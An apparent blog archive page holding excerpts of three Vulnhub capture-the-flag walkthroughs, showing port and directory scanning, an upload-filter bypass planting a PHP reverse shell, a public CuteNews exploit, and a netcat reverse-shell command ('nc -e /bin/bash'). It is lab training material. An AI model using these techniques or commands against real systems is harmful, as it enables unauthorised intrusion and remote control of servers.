Posts

Showing posts from September, 2020

Relevant:1 - Walkthrough [Vulnhub]

Here's my solution for Relevant:1. The machine can be downloaded from here.

Nmap

Scanning for all TCP ports.

$ nmap -sC -sV -p- 192.168.1.109

We find 2 ports open.

Enumeration

Browsing the website, the web page presents us with 3 links that seem to be some kind of hints, so let's check them out.

Browsing the 1st link, https://rb.gy/g5prrv, redirects to YouTube.

Browsing the 2nd link, https://pastebin.com/sGzQSQXu, shows what seems like a list of credentials. Just a thought: the home page says "because we hax0r3d your webz!", meaning the hacker has compromised the website. So maybe they have leaked the credentials here. Tried brute-forcing SSH but got no result.

Browsing the 3rd link, https://ibb.co/JtTY0Md, shows a QR code. We can browse to ZXing and decode it. Interesting; we keep it, as we may require it at further stages.

Let's scan for directories.

$ dirb http://192.168.1.109 -r

It seems the website is built on the WordPress CMS. We can use wpscan to enumerate it further.

$ wpscan --url http://192.168.1.109 -e

DevContainer:1 - Walkthrough [Vulnhub]

Here's my solution for DevContainer:1. The machine can be downloaded from here.

Nmap

Scanning for all TCP ports.

$ nmap -sC -sV -p- 192.168.1.104

We see only 1 port open.

Enumeration

Browsing the website and checking the source reveals neither useful information nor hints. We run dirb to scan the directories.

$ dirb http://192.168.1.104

Browsing /upload

Here we upload the PHP reverse shell file with a double extension, shell.php.jpg, and intercept the request using an intercepting proxy tool. After intercepting the request, we change the extension from shell.php.jpg to shell.php and forward the request. It seems that the payload/file is uploaded successfully.

Getting Access

Now, to run the payload/file, we first need to find its location. We hover the mouse over the broken image icon and look at the status bar to see the location of the file, or we can simply right-click the broken image icon and click Copy Image Location. Let us browse the location and on the other hand we start

BBS(cute):1.0.1 - Walkthrough [Vulnhub]

Here's my solution for BBS(cute):1.0.1. The machine can be downloaded from here.

Nmap

Scanning for all TCP ports.

$ nmap -sC -sV -p- 192.168.1.111

We find 5 ports open.

Enumeration

Browsing the website hosted on port 80 (the default HTTP port), we do not find any useful information, so let's run dirb to scan for directories.

$ dirb http://192.168.1.111 -r

Browsing /index.php

We see that it is built on the CuteNews CMS and its version is 2.1.2. We search for the exploit and found it here. Let's get this exploit.

Getting Access

Before running the exploit we need to make some changes. We remove all /CuteNews from the exploit code in order to run it successfully. Done with the changes, we now run the exploit.

$ python3 48800.py

We provide the required information, that is, the URL, and hit Enter. The commands are running fine, but we are not able to navigate to different directories, hence we try to get a normal reverse shell. We see netcat is present, so we enter the payload.

$ nc -e /bin/bash 19